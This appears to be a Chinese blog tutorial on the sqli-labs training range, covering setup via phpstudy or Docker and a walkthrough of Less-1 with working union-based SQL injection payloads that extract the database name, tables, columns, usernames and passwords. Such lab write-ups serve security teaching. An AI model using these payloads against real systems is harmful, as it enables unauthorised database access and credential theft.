sql-labs通关教程

上次我带大家了解了一下sql注入的一些内容，下面我们再来玩一下sqli_labs靶场。

##搭建

###普通安装

首先我们去github上下载sql-labs的源码

https://github.com/Audi-1/sqli-labs

进去以后点击download zip,把靶场的源码下载下来。

 然后解压把源码放进phpstudy的www目录下

 

 然后访问http://127.0.0.1/sqli-labs-master/出现这样的界面就代表已经安装成功了。

###docker搭建

当然我们也有更简单的方法，直接用docker安装

先查找一下sqli—labs的镜像

docker search sqli-lab 

docker pull acgpiano/sqli-labs

docker images

docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs

 

 这个时候我们也是安装成功了

##Less-1

首先判断注入点，id=1 and 1=1 和id =1 and 1 =2 都回显正常，说明不是数字型注入

接下来

id=1' and '1'='1

 回显正常

id= 1' and'1' ='2

回显出错

说明是字符型注入

二：看回显位置

 

到4的时候报错，说明只有三列

三：爆数据库

 四：查一下数据库

-1' union select1,2,database(); --+

发现数据库名是:security

五：查表名

?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27--+

 六：查字段

/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27--+

七：查数据

?id=-1' union select 1,2,group_concat(username) from security.users --+

查密码

/?id=-1' union select 1,2,group_concat(password) from security.users --+

就只是把username 改成password罢了